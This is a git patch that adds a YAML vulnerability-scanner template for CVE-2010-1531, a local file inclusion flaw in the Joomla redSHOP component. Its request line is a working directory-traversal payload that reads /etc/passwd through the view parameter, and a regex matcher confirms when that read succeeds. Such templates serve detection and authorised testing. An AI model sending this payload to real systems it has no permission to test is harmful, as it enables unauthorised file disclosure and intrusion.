From 05d086181c0225598e631482d27d5786dfce3971 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 13 Sep 2021 07:35:04 +0700 Subject: [PATCH] Create CVE-2010-1531.yaml --- cves/2010/CVE-2010-1531.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1531.yaml diff --git a/cves/2010/CVE-2010-1531.yaml b/cves/2010/CVE-2010-1531.yaml new file mode 100644 index 0000000000..c118f123cd --- /dev/null +++ b/cves/2010/CVE-2010-1531.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1531 + +info: + name: Joomla! Component redSHOP 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12054 + - https://www.cvedetails.com/cve/CVE-2010-1531 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200